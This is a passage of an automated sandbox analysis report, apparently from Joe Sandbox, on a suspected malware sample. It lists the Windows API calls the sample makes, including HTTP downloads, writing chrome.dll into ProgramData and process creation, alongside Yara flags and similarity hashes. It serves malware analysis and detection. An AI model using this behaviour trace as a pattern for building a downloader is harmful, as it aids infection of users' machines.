                                                                                                                                                                                                                                                            • Part of subcall function 00FE5229: RtlAllocateHeap.NTDLL(00000000), ref: 00FE5277
                                                                                                                                                                                                                                                            • Part of subcall function 00FE5229: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 00FE5299
                                                                                                                                                                                                                                                            • Part of subcall function 00FE5229: StrCmpCA.SHLWAPI(?), ref: 00FE52B3
                                                                                                                                                                                                                                                            • Part of subcall function 00FE5229: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FE52E3
                                                                                                                                                                                                                                                            • Part of subcall function 00FE5229: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00FE5322
                                                                                                                                                                                                                                                            • Part of subcall function 00FE5229: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00FE5352
                                                                                                                                                                                                                                                            • Part of subcall function 00FE5229: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FE535D
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1E6D: GetSystemTime.KERNEL32(?,010157AE,?), ref: 00FF1E9C
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                            • Part of subcall function 00FF2818: CreateFileA.KERNEL32(00FEECA7,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00FEECA7,C:\ProgramData\chrome.dll,?,?,?), ref: 00FF2832
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF2EAE
                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,010156F8), ref: 00FF2F00
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
Similarity
• API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcat$AllocateConnectFileOptionSendSystemTime_memsetlstrlen
• String ID: .exe
• API String ID: 2831197775-4119554291
• Opcode ID: f736704c54b6e485c7fbbd8e01eb9f3e25199857d859f4b837306c14c2f21c5b
• Instruction ID: 19c29915e3ca14e6a3668009741a3794dbe6afc92daf490158a8329d67e618d1
• Opcode Fuzzy Hash: f736704c54b6e485c7fbbd8e01eb9f3e25199857d859f4b837306c14c2f21c5b
• Instruction Fuzzy Hash: D6414372E0011D6BDB10FBA5EC43AEE7778AF44340F510461FA40B7162DAB96E46ABD1
APIs
• EncodePointer.KERNEL32(00000000,?), ref: 6CD64530
Strings
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
• Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: EncodePointer
• String ID: MOC$RCC
• API String ID: 2118026453-2084237596
• Opcode ID: e03aca573bf20ef153f17cef737b28bf9b6b3dd4198d232c17467a32cc1aa8d7
• Instruction ID: cb64db3ea469a95fc9a0389678cbcf9131c04734e8f15d92277d0ddb20f61c2b
• Opcode Fuzzy Hash: e03aca573bf20ef153f17cef737b28bf9b6b3dd4198d232c17467a32cc1aa8d7
• Instruction Fuzzy Hash: 48414871900109EFCF06CF95C990AEE7BB5FF48308F148159F914A7A61D335DA61DB61
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Xinvalid_argument_memmovestd::_
• String ID: string too long
• API String ID: 256744135-2556327735
• Opcode ID: 98972d0bebc27751f835e44f1ad9c1485abc588ab2fe3ffb437e5527585f378f
• Instruction ID: 02c504c7d663c3398c57087a9dcae405afa440b22e4828ffa8ae60ad11f893fc
• Opcode Fuzzy Hash: 98972d0bebc27751f835e44f1ad9c1485abc588ab2fe3ffb437e5527585f378f
• Instruction Fuzzy Hash: 0311A371300289EFEB189E2EDC40965B76AEFC5360B14053AF80587285D769ED58E792
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6CD61759
• ___raise_securityfailure.LIBCMT ref: 6CD61841
Strings
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
• Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: FeaturePresentProcessor___raise_securityfailure
• String ID: N{q`
• API String ID: 3761405300-2042453580
• Opcode ID: 90d48733773b94320abff2a6a69900ed233adba7f044d9efab823864f896a7d0
• Instruction ID: 24660644c02062df1d4512ab97af9f1df4f2468fdd52af2562c1a36e66eda327
• Opcode Fuzzy Hash: 90d48733773b94320abff2a6a69900ed233adba7f044d9efab823864f896a7d0
• Instruction Fuzzy Hash: B021BFF9610204EBFB44DF65D9957A4BBB8BB0A314F12506AE708DB790E7B09581CF2C
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                                                          • String ID: image/jpeg
                                                                                                                                                                                                                                                          • API String ID: 2803490479-3785015651
                                                                                                                                                                                                                                                          • Opcode ID: 4bfa610ef88a1f16fab2cfccadcc109891b67616ad616655ec70f5689b02c637
                                                                                                                                                                                                                                                          • Instruction ID: 47c21109e60405645ca888ad1513eebae656186214ce0e4284869fbf113142d8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bfa610ef88a1f16fab2cfccadcc109891b67616ad616655ec70f5689b02c637
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0311A572D00108FF8B619FA5D9858AF7F79FF41370B21426AFB11A21A0D7719E40AB50
APIs
• GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,00000000,?), ref: 6CD52D19
• GetProcAddress.KERNEL32(SymFromInlineContextW), ref: 6CD52D49
• GetProcAddress.KERNEL32(SymGetLineFromInlineContextW), ref: 6CD52D7C
• GetProcAddress.KERNEL32(SymQueryInlineTrace), ref: 6CD52E0A
Strings
• SymGetLineFromInlineContextW, xrefs: 6CD52D71
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
• Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: AddressProc$CurrentProcess
• String ID: SymGetLineFromInlineContextW
• API String ID: 2190909847-3625368168
• Opcode ID: cc366ef7d16057b361ec512f437283cd3761102669491c2499915436ec9ffffc
• Instruction ID: aef62f5f9302929b14e432e5ebe8abd6eb21209d14c1f1a20e9c81a0bb6a5b51
• Opcode Fuzzy Hash: cc366ef7d16057b361ec512f437283cd3761102669491c2499915436ec9ffffc
• Instruction Fuzzy Hash: B4119471B05305EBEF048F59C89468ABBF8EB85354F40852DFD9897760D731E9148BA2
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 00FEF561
  • Part of subcall function 0100E6E5: std::exception::exception.LIBCMT ref: 0100E6FA
  • Part of subcall function 0100E6E5: __CxxThrowException@8.LIBCMT ref: 0100E70F
  • Part of subcall function 0100E6E5: std::exception::exception.LIBCMT ref: 0100E720
  • Part of subcall function 00FEF45D: std::_Xinvalid_argument.LIBCPMT ref: 00FEF467
• _memmove.LIBCMT ref: 00FEF5B3
Strings
• invalid string position, xrefs: 00FEF55C
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
• String ID: invalid string position
• API String ID: 3404309857-1799206989
• Opcode ID: aa981d3a24693ea4638fcfcbbba59cadea5004db84cfe9f418f23a1ef205cfdc
• Instruction ID: 2495ba97433f96a478d6f942e633eb0e609f3186b3cd1f4f9c2c5f84e0172725
• Opcode Fuzzy Hash: aa981d3a24693ea4638fcfcbbba59cadea5004db84cfe9f418f23a1ef205cfdc
• Instruction Fuzzy Hash: 681104327003409BCF14EF6EDC805697365AF65324B580939F4168F281C370ED54AB92
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 00FEF775
  • Part of subcall function 0100E6E5: std::exception::exception.LIBCMT ref: 0100E6FA
  • Part of subcall function 0100E6E5: __CxxThrowException@8.LIBCMT ref: 0100E70F
  • Part of subcall function 0100E6E5: std::exception::exception.LIBCMT ref: 0100E720
• memmove.MSVCRT(00FEF100,00FEF100,C6C68B00,00FEF100,00FEF100,00FEF582,?,?,?,00FEF602,?,?,?,771B0440,?,-00000001), ref: 00FEF7AB
Strings
• invalid string position, xrefs: 00FEF770
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
• String ID: invalid string position
• API String ID: 1659287814-1799206989
• Opcode ID: 90beb982336f8a61bde9f421695fb0d4694fb06c4992894d566d6f26befa22b5
• Instruction ID: 7b9d0b6f463c3d7765226c46b161abd29387c7bf6f0ae61efe5930d07e21c119
• Opcode Fuzzy Hash: 90beb982336f8a61bde9f421695fb0d4694fb06c4992894d566d6f26befa22b5
• Instruction Fuzzy Hash: 2001AD353006828BD7248E6A8884916B7A6EB88B157214D3CE082CB688DB74E84AA390
APIs
  • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
  • Part of subcall function 00FE6955: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00FE69B7
  • Part of subcall function 00FE6955: StrCmpCA.SHLWAPI(?), ref: 00FE69D1
  • Part of subcall function 00FE6955: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FE6A00
  • Part of subcall function 00FE6955: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00FE6A3F
  • Part of subcall function 00FE6955: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00FE6A6F
  • Part of subcall function 00FE6955: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FE6A7A
  • Part of subcall function 00FE6955: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00FE6A9E
• StrCmpCA.SHLWAPI(?,ERROR), ref: 00FF6A50
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
• String ID: ERROR$ERROR
• API String ID: 3086566538-2579291623
• Opcode ID: 480341209f877668e963248d1ff9b5a2787a980b3e72e71ab82cb25c9f9422f9
• Instruction ID: 33b85bb50e4864c245a5848ec2b8ab34fa4621f26a10e38d0fbaa4cc9c42e6a8
• Opcode Fuzzy Hash: 480341209f877668e963248d1ff9b5a2787a980b3e72e71ab82cb25c9f9422f9
• Instruction Fuzzy Hash: 01016D32E0018C9BCB60FB76DC4799D37A86F40300B5145A2BD20E7227EA7DEA05BAD1
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: NameName::
• String ID: {flat}
• API String ID: 1333004437-2606204563
• Opcode ID: e2dde5f781f5e79941fe5dff7105eb0a524f90765c26bc3febfdf801c0bf74be
• Instruction ID: 40f02ddf36fedf6edc934f752aa2976b8b590ed3927f411af12ab0a4f99832a1
• Opcode Fuzzy Hash: e2dde5f781f5e79941fe5dff7105eb0a524f90765c26bc3febfdf801c0bf74be
• Instruction Fuzzy Hash: A8F0393215024C9FCB20DF58E455BB83BA2AF45B61F498084FA8C0F2BAC775D842EF91
APIs
  • Part of subcall function 00FEF4D4: _memmove.LIBCMT ref: 00FEF4EE
                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00FEF72D
                                                                                                                                                                                                                                                            • Part of subcall function 0100E9FA: RaiseException.KERNEL32(?,?,?,00FEF820,?,?,?,?,?,00FEF820,?,0101A8C4,?), ref: 0100EA3C
                                                                                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 00FEF738
                                                                                                                                                                                                                                                            • Part of subcall function 0100E6E5: std::exception::exception.LIBCMT ref: 0100E6FA
                                                                                                                                                                                                                                                            • Part of subcall function 0100E6E5: __CxxThrowException@8.LIBCMT ref: 0100E70F
                                                                                                                                                                                                                                                            • Part of subcall function 0100E6E5: std::exception::exception.LIBCMT ref: 0100E720
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • invalid string position, xrefs: 00FEF733
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Exception@8Throwstd::exception::exception$ExceptionRaiseXinvalid_argument_memmovestd::_
                                                                                                                                                                                                                                                          • String ID: invalid string position
                                                                                                                                                                                                                                                          • API String ID: 224251009-1799206989
                                                                                                                                                                                                                                                          • Opcode ID: cbe010f35585128dd0c87a60521b9d86c1bf73b3f362764a6c10cb6642840e87
                                                                                                                                                                                                                                                          • Instruction ID: 9ab404c4ec504b7798023b9646cb9d7aaa9837089c0deda487d84dee9c77f8af
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cbe010f35585128dd0c87a60521b9d86c1bf73b3f362764a6c10cb6642840e87
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EAE086B150020CBBDB04EBA9DC55DCEB7ECDF48254F108579FB0AF3681DAB0AE005650
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: GlobalMemoryStatus_memset
• String ID: @
• API String ID: 587104284-2766056989
• Opcode ID: f29918cadafcb4389a37711d05851a264377d4793a475fde34ad780143c72b49
• Instruction ID: a1931fe40a28e5fe231cb51144fd6d3285a43b75802bf69a25603082f3a28ce8
• Opcode Fuzzy Hash: f29918cadafcb4389a37711d05851a264377d4793a475fde34ad780143c72b49
• Instruction Fuzzy Hash: 12E0BFB190020C9BEB11EFE4DA46B9DB7B8AB08604F504025AA45E7281EB78BA099B55